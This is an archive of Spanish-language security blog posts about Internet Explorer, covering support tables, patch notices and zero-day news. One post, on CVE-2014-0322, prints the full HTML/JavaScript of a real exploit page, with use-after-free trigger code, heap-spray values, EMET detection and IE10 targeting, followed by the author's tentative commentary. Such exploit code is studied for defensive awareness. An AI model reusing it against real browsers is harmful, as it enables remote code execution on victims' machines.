Este blog ya no está activo, sigue informándote aquí:

Mostrando entradas con la etiqueta Internet Explorer. Mostrar todas las entradas
Mostrando entradas con la etiqueta Internet Explorer. Mostrar todas las entradas

miércoles, 13 de enero de 2016

Internet Explorer 8,9 y 10 CASI Fuera de soporte.

Hace un par de días que llevo viendo casi entre luces de neon fosforito el titular "Se acaba el soporte para Internert Explorer 8, 9 y 10" y bueno, esto es una verdad a medias ya algunas de estas versiones siguen estando vivas en mas de un Sistema operativo de Microsoft. O al menos eso es lo que indica Microsoft en la notificación que lanzó ayer dia 12 de enero.


Aquí tenéis las tablas extraídas de la notificación:

Windows Desktop Operating Systems
Internet Explorer Version
Windows Vista SP2
Internet Explorer 9
Windows 7 SP1
Internet Explorer 11
Windows 8.1 Update
Internet Explorer 11

Windows Server Operating Systems
Internet Explorer Version
Windows Server 2008 SP2
Internet Explorer 9
Windows Server 2008 IA64 (Itanium)
Internet Explorer 9
Windows Server 2008 R2 SP1
Internet Explorer 11
Windows Server 2008 R2 IA64 (Itanium)
Internet Explorer 11
Windows Server 2012
Internet Explorer 10
Windows Server 2012 R2
Internet Explorer 11

Windows Embedded Operating Systems
Internet Explorer Version
Windows Embedded for Point of Service (WEPOS)
Internet Explorer 7
Windows Embedded Standard 2009 (WES09)
Internet Explorer 8
Windows Embedded POSReady 2009
Internet Explorer 8
Windows Embedded Standard 7
Internet Explorer 11
Windows Embedded POSReady 7
Internet Explorer 11
Windows Thin PC
Internet Explorer 8*
Windows Embedded 8 Standard
Internet Explorer 10
Windows 8.1 Industry Update
Internet Explorer 11


Si queréis mi opinión y antes de que empecéis a dejar vuestros IE 8, 9 y 10 hasta que se le acabe el soporte. Os recomiendo que actualicéis a Internet explorer 11 aparte de estar actualmente 100% en soporte y ser mas seguro, Microsoft nos ofrece la [retro-compatibilidad con versiones anteriores] gracias a su Enterprise Mode. De esta manera podemos usar aplicaciones que tardarán tiempo en estar en soporte con un navegador seguro y dentro del periodo actualizaciones. Además, de esta manera, nos ahorramos de este dolor de cabeza por unos largos meses. 

Os dejo aquí la famosa notificación de Microsoft de la que os he hablado: 
Ojo, a Windows 8 ya no hay quien lo salve y nadie lo ha comentado. ¡Actualizad a 8.1 que es gratis y esta en soporte!

Sed Buenos ;)

martes, 18 de febrero de 2014

(CVE-2014-0322).- Mas De Información Sobre el 0'day De IE

Si os acordáis hace tres días (cuatro depende como los cuentes xD) escribir sobre el nuevo [0'day para IE] el cual había mucha historia por detrás de la cual aun no he podido enterarme. Pero ya puestos a saber mas sobre la historia me dedique a buscar mas información sobre como funcionaba este exploit y la encontré. Me lo baje rápido y empece a mirarlo junto con la explicaciones de [Blackploit] (un blog que os recomiendo encarecidamente.)


Como podéis ver en el .rar solo había un archivo .html, un .swf y otro .as3 y partiendo de la premisa de que es una ataque centrado en IE 10 y Adobe Flash y  que es necesario un "liberación" previa ([use-after-free]) huele mucho tener un .swf (Adobe Flash tampoco defrauda xD) 

Así que eche un repaso al código fuente del .html en busca de algún script o algún embed que diera lugar a la "reproducción" (no se como decirlo mejor) de este Tope.swf y me sorprendieron un par de cosa. 

<html>
<head id="headId">
<title>main page</title>
<script>
function dword2data(dword) { 
var d = Number(dword).toString(16); 
while (d.length < 8) 
d = '0' + d; 
return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4)); 
} 


function developonther(txt) { 
var xmlDoc = new ActiveXObject("Microsoft.XMLDOM"); 
xmlDoc.async = true; 
xmlDoc.loadXML(txt); 
if (xmlDoc.parseError.errorCode != 0) { 
var err; 
err = "Error Code: " + xmlDoc.parseError.errorCode + "\n"; 
err += "Error Reason: " + xmlDoc.parseError.reason; 
err += "Error Line: " + xmlDoc.parseError.line; 
if (err.indexOf("-2147023083") > 0) { 
return 1; 
} else { 
return 0; 
} 
} 
return 0; 
} 
var g_arr = []; 
var arrLen = 0x250; 

function fun() { 

var a = 0; 
for (a = 0; a < arrLen; ++a) { 
g_arr[a] = document.createElement('div') 
}; 
var b = dword2data(0xdeadc0de); 
var c = 0x1a1b2000; 
while (b.length < 0x360) { 
if (b.length == (0x94 / 2)) { 
b += dword2data(c + 0x10 - 0x0c) 
} else if ( 
b.length == (0x98 / 2)) { 
b += dword2data(c + 0x14 - 0x8) 
} else if (b.length == (0xac / 2)) { 
b += dword2data(c - 0x10) 
} else if (b.length == (0x15c / 2)) { 
b += dword2data(0x42424242) 
} else { 
b += dword2data(0x1a1b2000 - 0x10) 
} 
}; 
var d = b.substring(0, (0x340 - 2) / 2); 
try { 
this.outerHTML = this.outerHTML 
} catch (e) {} 
CollectGarbage(); 
for (a = 0; a < arrLen; ++a) { 
g_arr[a].title = d.substring(0, d.length); 
} 
} 
function puIHa3() { 

var bamboo_go = "<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'res://C:\\windows\\AppPatch\\EMET.DLL'>"; 

if (navigator.userAgent.indexOf("MSIE 10.0") > 0) { 
if (developonther(bamboo_go)) { 

return; 
} 
var a = document.getElementsByTagName("script"); 
var b = a[0]; 
b.onpropertychange = fun; 
var c = document.createElement('SELECT'); 
c = b.appendChild(c); 
} else if (navigator.userAgent.indexOf("IE10") > 0) { 
if (developonther(bamboo_go)) { 

return; 

} 
var a = document.getElementsByTagName("script"); 
var b = a[0]; 
b.onpropertychange = fun; 
var c = document.createElement('SELECT'); 
c = b.appendChild(c); 
} 
} 
</script>
<embed src=Tope.swf width=10 height=10></embed>
</head>
</html>
La verdad es que no llego a saber que hace todo el código correctamente, pero esta claro que utiliza el script para embeder el Tope.swf que esta claro que estará preparado para hacer que Adobe Flash nos de la magia que necesitamos. Ademas de tener un ancho y una altura casi menospreciables. 

Una de las cosas que mas me a gustado es la inclusión de la función fun no podemos discutir que se lo estaba pasando bien cuando programaba esto. Otra cosa que mas me gusta son las continuas comprobaciones que hace para ver si el navegador esta utilizando IE10 y la utilización de la variable bamboo_go (Esta ultima me entraña  bastante curiosidad y por mas que he buscado no tengo ni idea del porqué).

Hacia mucho que no hacia una entrada tan didáctica, para mi quiero decir. Sentarme, "analizar" (si se le puede llamar así) el código y intentar entender lo que hace. Yo aprendo mucho de esta manera aunque algunos os parezca una tontería.  

Por ultimo me gustaría recomendaros el blog de Blackploit del cual es fuente de todo este articulo y fuente también de este material. Os dejo el enlace al blog aquí abajo. 

sábado, 15 de febrero de 2014

IE Nunca Defrauda.- Nuevo 0'Day IE10

Hace casi un año hablamos sobre una famosa vulnerabilidad en la [version 8 de Internet Explorer]  y de que estaba siendo usado en la técnica llamada [Watering Hole Attack]. Pues ayer se volvió a repetir pero esta vez tenemos la vulnerabilidad en la versión 10. Aunque con algo de historia o "especulación" debido a que fué servida desde la pagina web de U.S. Veterans of Foreign Wars.

Jerome Segura de la empresa Malwarebytes fue capaz de reproducir una infección exitosa en Windows 7 con Internet Explorer 10 y la última versión de Flash Player. Como señala Segura, el fallo de seguridad es "un error de uso después de liberación que da el atacante acceso directo a la memoria en una dirección arbitraria, usando un archivo corrupto de Adobe Flash, siendo capaz de pasar la protección Space Layout Randomization (ASLR) y Data Execution Prevention (DEP)".
Link al CVE de la vulnerabilidad:
Fuente y mas información sobre la historia que hay detrás de esta vulnerabilidad : 
Sed Buenos y Actualizad vuestro IE a la versión 11 ;) 

viernes, 4 de octubre de 2013

Microsoft .- Un Parche Para La Vulnerabilidad en IE11

Hace ya mas de medio mes os hable [sobre la, hora ya famosa, vulnerabilidad CVE-2013-3893] la cual, afectaba a la mayoría de sistemas Windows incluido Windows 8.1 y a una multitud de versiones de IE (Internet Explorer) incluida la mas reciente IE11 


Microsoft, hoy, a anunciado un Parche para solventar esa vulnerabilidad y alguna mas de paso. Este parche tiene fecha para este martes 8 de octubre. Para los que queráis mas información os dejo la ruta al Microsoft Security Bulletin Advance Notification for October 2013
Así que ya sabéis todos a actualizar este próximo martes. Sed Buenos ;)  

miércoles, 18 de septiembre de 2013

Microsoft.- Vulnerabilidad en IE CVE-2013-3893

Hace mucho tiempo que no os hablaba de vulnerabilidades tal cual, no solo informaros que hay "X" vulnerabilidad en "Y" sistema, si no en explicaros un poco el contenido de ella. Así que, voy a ponerme manos a la obra con la vulnerabilidad CVE-2013-3893.


Esta vulnerabilidad afecta a Internet Explorer versiones 6, 7, 8, 9, 10 y 11 en Windows XP, Vista, 7, 8 y 8.1, tanto Preview como la nueva RTM y no nos salvamos si usamos las versiones de 32 bits  o 64 bits de cualquiera de los sistemas incluso versiones server. Vamos que como no lo parcheemos pillamos fijo. Después del uso de la Vulnerabilidad, la implementacion de un SetMouseCapture en la mshtml.dll (un modulo de IE que contiene funciones de Html-related) en Microsoft Internet Explorer 6 a 11, permite a atacantes remotos ejecutar código arbitrario a través de cadenas JavaScript hechas a mano. 

Lo malo de esta vulnerabilidad es que la tendremos que parchear con Fix It hasta que Microsoft no saque una actualización para este problema. 
También para los que tengáis mas curiosidad sobre esta vulnerabilidad os paso el Security Advisory de Microsoft y echaros un ojo por la cantidad de sistemas que han sido afectados y necesitarían de un parcheado inmediato. 
Sed Buenos con esto ;)